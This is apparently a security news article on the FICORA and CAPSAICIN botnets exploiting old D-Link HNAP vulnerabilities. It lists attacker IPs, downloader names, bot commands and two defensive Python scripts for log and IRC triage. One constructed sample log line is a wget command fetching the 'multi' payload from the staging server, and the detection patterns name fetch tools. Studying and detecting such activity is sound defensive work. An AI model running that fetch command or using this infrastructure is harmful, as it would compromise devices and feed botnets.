FICORA and Kaiten Botnets Exploit Old D-Link Vulnerabilities for Global Attacks


Cybersecurity researchers are warning about a spike in malicious activity that involves roping vulnerable D-Link routers into two different botnets, a Mirai variant dubbed FICORA and a Kaiten (aka Tsunami) variant called CAPSAICIN.

“These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the HNAP (Home Network Administration Protocol) interface,” Fortinet FortiGuard Labs researcher Vincent Li said in a Thursday analysis.

“This HNAP weakness was first exposed almost a decade ago, with numerous devices affected by a variety of CVE numbers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.”

According to the cybersecurity company’s telemetry data, attacks involving FICORA have targeted various countries globally, whereas those related to CAPSAICIN primarily singled out East Asian territories like Japan and Taiwan. The CAPSAICIN activity is also said to have been “intensely” active only between October 21 and 22, 2024.

FICORA botnet attacks lead to the deployment of a downloader shell script (“multi”) from a remote server (“103.149.87[.]69”), which then proceeds to download the main payload for different Linux architectures separately using wget, ftpget, curl, and tftp commands.

Present within the botnet malware is a brute-force attack function containing a hard-coded list of usernames and passwords. The Mirai derivative also packs in features to conduct distributed denial-of-service (DDoS) attacks using UDP, TCP, and DNS protocols.

The downloader script (“bins.sh”) for CAPSAICIN leverages a different IP address (“87.10.220[.]221”), and follows the same approach to fetch the botnet for various Linux architectures to ensure maximum compatibility.

“The malware kills known botnet processes to ensure it is the only botnet executing on the victim host,” Li said. “‘CAPSAICIN’ establishes a connection socket with its C2 server, ‘192.110.247[.]46,’ and sends the victim host’s OS information and the nickname given by the malware back to the C2 server.”
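The infection chain described above gives a defender a handful of concrete things to look for on an edge device: HNAP requests that invoke the GetDeviceSettings action, outbound connections to the staging and C2 addresses quoted in the analysis, and a fetch of the "multi" or "bins.sh" downloader with wget, ftpget, curl or tftp. The following Python is an added example, not code from the article or from Fortinet, that runs those checks over router log lines. The log lines are constructed for illustration, and the HNAP access-log line assumes the web server records the HNAP action name; the indicator addresses are the ones quoted in the article, pasted in their defanged form.

```python
import re

# Indicators quoted in the article, kept in the defanged form used there.
def refang(indicator: str) -> str:
    """Turn the article's defanged form (1.2.3[.]4) back into a matchable address."""
    return indicator.replace("[.]", ".")

IOC_IPS = {refang(ip) for ip in ("103.149.87[.]69", "87.10.220[.]221", "192.110.247[.]46")}
DOWNLOADER_NAMES = ("multi", "bins.sh")          # downloader scripts named in the article
FETCH_TOOLS = ("wget", "ftpget", "curl", "tftp")  # fetch commands the scripts fall back through

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample lines (not from the article): one router web-server access line for an
# HNAP request (assumes the server logs the action name), netfilter-style lines for outbound
# connections, and one shell audit line showing a fetch of the "multi" downloader.
SAMPLE_LOGS = [
    '203.0.113.7 - - [21/Oct/2024:10:11:12 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "GetDeviceSettings"',
    '198.51.100.4 - - [21/Oct/2024:10:12:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-"',
    "Oct 21 10:11:13 router kernel: OUT=eth0 SRC=192.168.0.1 DST=103.149.87.69 PROTO=TCP",
    "Oct 21 10:11:14 router sh: wget http://103.149.87.69/multi -O /tmp/multi",
    "Oct 21 10:11:20 router kernel: OUT=eth0 SRC=192.168.0.1 DST=192.110.247.46 PROTO=TCP",
    "Oct 21 10:13:00 router kernel: OUT=eth0 SRC=192.168.0.1 DST=198.51.100.9 PROTO=TCP",
]


def classify(line: str) -> list:
    """Return the list of reasons a single log line is suspicious (empty if none)."""
    reasons = []

    # 1. HNAP GetDeviceSettings requests: the action abused by the exploited CVEs.
    if "/HNAP1" in line and "GetDeviceSettings" in line:
        reasons.append("hnap_getdevicesettings")

    # 2. Any address in the line that matches a known staging or C2 server.
    hits = sorted(set(IPV4_RE.findall(line)) & IOC_IPS)
    reasons.extend(f"ioc_ip:{ip}" for ip in hits)

    # 3. A fetch tool being used to pull a known downloader name or from a known address.
    uses_fetch_tool = any(re.search(rf"\b{tool}\b", line) for tool in FETCH_TOOLS)
    names_downloader = any(re.search(rf"/{re.escape(name)}\b", line) for name in DOWNLOADER_NAMES)
    if uses_fetch_tool and (names_downloader or hits):
        reasons.append("payload_fetch")

    return reasons


def scan(lines):
    """Map line index -> reasons for every line that triggered at least one check."""
    return {i: r for i, line in enumerate(lines) if (r := classify(line))}


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOGS).items():
        print(f"line {i}: {', '.join(reasons)}")
```

Running the block flags four of the six constructed lines: the HNAP request, the two outbound connections to listed addresses, and the wget line, which is reported both for its destination and as a payload fetch. The address and name lists are deliberately small and explicit so they can be swapped for a current feed; the HNAP check is the durable one, since a device that is not meant to be managed over HNAP from the WAN should never see that request from outside.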

CAPSAICIN then awaits further commands to be executed on the compromised devices, including “PRIVMSG,” a command that could be used to perform various malicious operations such as the following:

GETIP – Get the IP address from an interface
CLEARHISTORY – Remove command history
FASTFLUX – Start a proxy to a port on another IP to an interface
RNDNICK – Randomize the victim host’s nickname
NICK – Change the nickname of the victim host
SERVER – Change command-and-control server
ENABLE – Enable the bot
KILL – Kill the session
GET – Download a file
VERSION – Request the version of the victim host
IRC – Forward a message to the server
SH – Execute shell commands
ISH – Interact with victim host’s shell
SHD – Execute shell command and ignore signals
INSTALL – Download and install a binary to “/var/bin”
BASH – Execute commands using bash
BINUPDATE – Update a binary to “/var/bin” via get
LOCKUP – Kill Telnet backdoor and execute the malware instead
HELP – Display help information about the malware
STD – Flooding attack with random hard-coded strings for the port number and target specified by the attacker
UNKNOWN – UDP flooding attack with random characters for the port number and target specified by the attacker
HTTP – HTTP flooding attack
HOLD – TCP connection flooding attack
JUNK – TCP flooding attack
BLACKNURSE – BlackNurse attack, which is based on the ICMP packet flooding attack
DNS – DNS amplification flooding attack
KILLALL – Stop all DDoS attacks
KILLMYEYEPEEUSINGHOIC – Terminate the original malware
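Because CAPSAICIN takes its orders over IRC, an analyst who has a capture of the C2 channel can read the operator’s intent directly from the PRIVMSG text. The Python below is an added example, not code from the article or from Fortinet: it parses generic IRC PRIVMSG lines, matches the first word against the command names listed above, and groups them by the capability they give the operator (DDoS, shell access, persistence, evasion, control). The IRC lines are constructed, and the assumption that the bot command is the first word of the message, optionally prefixed by a sigil such as "!" or "*", is ours, not something the article states.

```python
import re
from collections import Counter

# Command names from the list above, grouped by the capability they give the operator.
DDOS = {"STD", "UNKNOWN", "HTTP", "HOLD", "JUNK", "BLACKNURSE", "DNS"}
SHELL = {"SH", "ISH", "SHD", "BASH"}
PERSISTENCE = {"GET", "INSTALL", "BINUPDATE", "LOCKUP", "SERVER"}
EVASION = {"CLEARHISTORY", "RNDNICK", "NICK", "KILLMYEYEPEEUSINGHOIC"}
CONTROL = {"GETIP", "VERSION", "HELP", "IRC", "ENABLE", "KILL", "KILLALL", "FASTFLUX"}
CATEGORIES = {
    "ddos": DDOS,
    "shell": SHELL,
    "persistence": PERSISTENCE,
    "evasion": EVASION,
    "control": CONTROL,
}

# Generic IRC PRIVMSG shape: optional ":prefix", then "PRIVMSG <target> :<text>".
PRIVMSG_RE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

# Constructed sample of a captured channel (not from the article). Addresses are
# documentation ranges; the operator nick and channel name are made up.
SAMPLE_IRC = [
    ":op!op@198.51.100.5 PRIVMSG #bots :KILLALL",
    ":op!op@198.51.100.5 PRIVMSG #bots :!STD 203.0.113.10 80",
    ":op!op@198.51.100.5 PRIVMSG #bots :SH uname -a",
    ":op!op@198.51.100.5 PRIVMSG #bots :INSTALL update",
    "PING :irc.example.test",
    ":op!op@198.51.100.5 PRIVMSG bot42 :hello there",
]


def category_of(command: str) -> str:
    """Name the capability group a command belongs to, or 'chatter' if it is not a bot command."""
    for name, members in CATEGORIES.items():
        if command in members:
            return name
    return "chatter"


def parse_privmsg(line: str):
    """Parse one IRC line; return an event dict for PRIVMSGs, None for anything else."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    words = m.group("text").split()
    if not words:
        return None
    # Assumption (not stated in the article): the command is the first word, and an
    # operator may prefix it with a sigil such as "!" or "*", which we strip first.
    command = words[0].lstrip("!*").upper()
    return {
        "operator": m.group("prefix") or "",
        "target": m.group("target"),
        "command": command,
        "args": words[1:],
        "category": category_of(command),
    }


def triage(lines):
    """Return (events, summary): parsed PRIVMSG events and a Counter of categories seen."""
    events = [e for e in (parse_privmsg(line) for line in lines) if e]
    return events, Counter(e["category"] for e in events)


def ddos_orders(events):
    """Pull out the DDoS commands and their arguments, so the targets ordered can be notified."""
    return [(e["command"], e["args"]) for e in events if e["category"] == "ddos"]


if __name__ == "__main__":
    events, summary = triage(SAMPLE_IRC)
    for e in events:
        print(f"{e['category']:12} {e['command']:10} {' '.join(e['args'])}")
    print(dict(summary))
    print(ddos_orders(events))
```

On the constructed capture the summary is one event in each of the five groups, and ddos_orders() returns the single STD order with its arguments, which is the piece an incident responder most wants: the victim of the flood, not just the fact that a bot is present. Separating the control and chatter categories from the rest keeps a noisy channel from drowning out the few commands that change what the device does.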

“Although the weaknesses exploited in this attack had been exposed and patched nearly a decade ago, these attacks have remained continuously active worldwide,” Li said. “It is crucial for every enterprise to regularly update the kernel of their devices and maintain comprehensive monitoring.”


The Hacker News
